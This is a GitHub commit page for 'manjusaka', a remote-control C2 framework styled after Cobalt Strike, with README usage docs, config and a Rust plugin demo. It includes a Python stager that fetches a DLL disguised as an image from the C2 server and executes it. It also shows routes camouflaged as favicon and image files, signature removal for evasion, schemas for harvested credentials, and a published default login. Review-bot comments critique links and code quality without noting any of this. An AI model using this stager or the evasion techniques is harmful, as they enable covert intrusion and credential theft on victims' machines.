Commit 2c6c8c6

author
ydhcui
committed
update 0.5
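### v0.5 1. Fix security vulnerabilities 2. Open up NPC configuration editing 3. Optimize the file upload flow 4. Add dynamic plugin support so more features can be added 5. Remove signatures, fix bugs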
1 parent 831b5e9 commit 2c6c8c6

27 files changed

+12528
-10
lines changed

README.md

Lines changed: 137 additions & 9 deletions
@@ -13,25 +13,151 @@
1313
# manjusaka
1414
牛屎花 一款基于WEB界面的仿CobaltStrike C2远控
1515

16-
##系统架构: ![164759109](https://user-images.githubusercontent.com/46884495/159195361-cc3b75f1-ab5e-425b-a3b3-65d65878c048.jpg)
16+
##系统架构: ![](./images/1.jpg)
1717

18-
##操作截图:
18+
## 使用方法
19+
```bash
20+
[root@devops nps]# ./manjusaka
21+
[NPS] 2022/09/14 15:57:21 初始用户: manjusaka 密码: ZbFCa2L2LRd5
22+
[NPS] 2022/09/14 15:57:21 创建项目: 公共项目 没有归属的npc放在这个项目里面
23+
[NPS] 2022/09/14 15:57:21 监听项目路由: VHOS5vqN
24+
[NPS] 2022/09/14 15:57:21 NPS监听地址 :3200
25+
[NPS] 2022/09/14 15:57:21 NPU后台地址 : manjusaka
26+
[NPS] 2022/09/14 15:57:21 NPC监听地址 :801
27+
[NPS] 2022/09/14 15:57:21 NPC交互路由 : /:target/favicon.ico
28+
[NPS] 2022/09/14 15:57:21 NPC下载路由 : /:target/assert/:sys/bg.jpg
29+
[NPS] 2022/09/14 15:57:21 NPC文件路由 : /images/:fid/logo.png
30+
```
31+
则NPS访问地址为 http://192.168.93.217:3200/manjusaka
1932

20-
![微信截图_20220406181015](https://user-images.githubusercontent.com/46884495/161952357-d9a86804-0b52-4866-b1f9-2148746f744d.png)
2133

22-
![微信截图_20220318162038](https://user-images.githubusercontent.com/46884495/159195383-348e6fb1-3516-40be-9522-5c562e626d36.png)
34+
1、创建项目,默认有一个公共项目,选择当前项目后 可在回传结果里面查看当前项目回传的信息
2335

24-
![微信截图_20220318162241](https://user-images.githubusercontent.com/46884495/159195398-bf7b2cd1-cbae-4d23-a101-fc8311c24949.png)
36+
![](./images/1.jpg)
2537

26-
![微信截图_20220406180114](https://user-images.githubusercontent.com/46884495/161950618-aadf6240-5672-4756-b103-f8be08f55747.png)
2738

28-
## 使用方法
29-
./manjusaka -h
39+
2、根据项目 生成npc 可以直接使用exe或elf格式的npc。也可以使用其它语言加载npc母体 比如使用python加载npc
3040

31-
默认 ./manjusaka -h vpsip
41+
```python
42+
import requests
43+
from ctypes import cdll
44+
45+
res = requests.get("http://192.168.93.217:801/bq1iFEP2/assert/dll/bg.jpg")
46+
with open("a.dll","wb") as f:
47+
f.write(res.content)
48+
49+
dll = cdll.LoadLibrary("a.dll")
50+
dll.main()
51+
52+
```
53+
54+
55+
![](./images/2.jpg)
56+
57+
3、npc上线,点选中该npc即可对其进行操作
58+
59+
![](./images/3.jpg)
60+
61+
![](./images/4.jpg)
62+
63+
![](./images/5.jpg)
64+
65+
![](./images/6.jpg)
66+
67+
![](./images/7.jpg)
68+
69+
![](./images/8.jpg)
70+
71+
72+
4、插件系统 生成dll/so插件, 以plug_name_nps.dll格式命名放到plugins文件夹下面 即可动态调用
73+
插件开发示例, main传入插件运行参数 传出返回的内容值
74+
```rust
75+
/*
76+
//./Cargo.toml
77+
[lib]
78+
path = "src/lib.rs"
79+
crate-type = ["cdylib"]
80+
*/
81+
82+
//src/lib.rs
83+
84+
use std::ffi::CStr;
85+
use std::ffi::CString;
86+
use std::os::raw::c_char;
87+
88+
#[no_mangle]
89+
pub unsafe extern "C" fn main(args: *const c_char) -> *const c_char {
90+
let r_str = CStr::from_ptr(args).to_str().unwrap();
91+
92+
println!("plugin load args: {}", r_str);
93+
let c_str = format!("plugin return {}",r_str);
94+
95+
CString::new(c_str).expect("CString failed").into_raw()
96+
}
97+
98+
```
99+
返回值匹配到如下protobuf格式后后将结果写入数据库
100+
101+
```protobuf
102+
syntax = "proto3";
103+
104+
message PassResult{
105+
string username = 1;
106+
string password = 2;
107+
string passtype = 3;
108+
string passfrom = 4;
109+
}
110+
111+
message PassScan{
112+
string hosts = 1;
113+
string ports = 2;
114+
string args = 3;
115+
repeated PortResult result = 4;
116+
}
117+
118+
message PortResult{
119+
string host = 1;
120+
string port = 2;
121+
string proto = 3;
122+
string version = 4;
123+
}
124+
message PortScan{
125+
string hosts = 1;
126+
string ports = 2;
127+
string args = 3;
128+
repeated PortResult result = 4;
129+
}
130+
message HttpResult{
131+
string proto = 1;
132+
string host = 2;
133+
string port = 3;
134+
string title = 4;
135+
string note = 5;
136+
}
137+
message HttpScan{
138+
string hosts = 1;
139+
string ports = 2;
140+
string args = 3;
141+
repeated PortResult result = 4;
142+
}
143+
144+
```
145+
32146

33147
## 更新
34148

149+
### v0.5
150+
1、修复安全漏洞
151+
152+
2、开放NPC配置修改功能
153+
154+
3、上传文件流程优化
155+
156+
4、增加动态插件功能,可拓展更多功能
157+
158+
5、去除特征、修复bug
159+
160+
35161
### v0.4
36162
1、随机key
37163
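Review bot: The image links added in this README hunk point at `./images/1.jpg` through `./images/8.jpg`, but the files this commit adds are `images/1.png` to `images/8.png` (only `images/0.jpg` is a JPEG), so every screenshot link will be broken; the architecture heading and step 1 also both reference `./images/1.jpg`. Point the links at the `.png` files and give the architecture diagram its own file. In the protobuf block, `PassScan` and `HttpScan` both declare `repeated PortResult result = 4;` although `PassResult` and `HttpResult` are defined right beside them, which looks like a copy-paste slip. The sample startup log also publishes an initial username and password and should be redacted in the docs.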

@@ -58,3 +184,5 @@
58184
1、实现基础远控功能。
59185

60186

187+
## 交流
188+
https://discord.gg/YMqeN5Qyk4

conf.toml

Lines changed: 1 addition & 1 deletion
@@ -23,7 +23,7 @@ redirect = "http://www.microsoft.com"
2323
server = ""
2424

2525
#文件操作路由,遵守gin路由规则 后端会读取target目标、和fid的值
26-
route = "/images/:target/:fid/logo.png"
26+
route = "/images/:fid/logo.png"
2727

2828
#fid有效时间(秒)
2929
fidtimeout = 3600
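Review bot: The comment above `route` still says the backend reads both the target and the fid values, but the new pattern `/images/:fid/logo.png` no longer has a `:target` segment. Update the comment to match, and confirm the handler no longer looks up a `target` parameter that will now always be empty.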

images/0.jpg

54 KB

images/1.png

55.2 KB

images/2.png

60.1 KB

images/3.png

55.6 KB

images/4.png

94.6 KB

images/5.png

56.7 KB

images/6.png

88.6 KB

images/7.png

55.6 KB

images/8.png

40.7 KB

manjusaka

8.47 MB
Binary file not shown.

manjusaka-0.4

-11.5 MB
Binary file not shown.

manjusaka-v0.3

-14.1 MB
Binary file not shown.

plug_demo/.cargo/config

Lines changed: 8 additions & 0 deletions
@@ -0,0 +1,8 @@
1+
[target.x86_64-pc-windows-gnu]
2+
rustflags = [
3+
"-C", "link-arg=s",
4+
]
5+
[target.x86_64-pc-windows-msvc]
6+
rustflags = [
7+
"-C", "link-arg=/DEBUG:NONE",
8+
]
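Review bot: `"-C", "link-arg=s"` under `[target.x86_64-pc-windows-gnu]` passes a bare `s` to the linker, which will be taken as an input file name rather than an option; if the intent is to strip symbols, it should read `link-arg=-s`. A short comment saying what each target's flag is for would help, since the two blocks use different linker syntaxes.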

plug_demo/Cargo.lock

Lines changed: 7 additions & 0 deletions
Some generated files are not rendered by default. Learn more about customizing how changed files appear on GitHub.

plug_demo/Cargo.toml

Lines changed: 19 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,19 @@
1+
[package]
2+
name = "plug_test_nps"
3+
version = "0.1.0"
4+
edition = "2021"
5+
6+
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
7+
[profile.release]
8+
opt-level = "s" # Optimize for size.
9+
lto = true # Enable Link Time Optimization
10+
codegen-units = 1 # Reduce number of codegen units to increase optimizations.
11+
12+
13+
[lib]
14+
path = "src/lib.rs"
15+
crate-type = ["cdylib"]
16+
17+
18+
[dependencies]
19+

plug_demo/src/lib.rs

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
use std::ffi::CStr;
2+
use std::ffi::CString;
3+
use std::os::raw::c_char;
4+
5+
#[no_mangle]
6+
pub unsafe extern "C" fn main(s: *const c_char) -> *const c_char {
7+
let r_str = CStr::from_ptr(s).to_str().unwrap();
8+
9+
println!("plugin load: {}", r_str);
10+
let c_str = format!("plugin return {}",r_str);
11+
12+
CString::new(c_str).expect("CString failed").into_raw()
13+
}
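Review bot: `CStr::from_ptr(s).to_str().unwrap()` on line 7 panics if the host passes non-UTF-8 bytes, and `from_ptr` is called without a null check; a panic inside an `extern "C"` function must not unwind into the caller. Check `s.is_null()` first and handle the `to_str()` error by returning an error string instead of unwrapping. The pointer returned from `into_raw()` is never reclaimed because no matching free function is exported, so document who owns it or export one that calls `CString::from_raw`.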
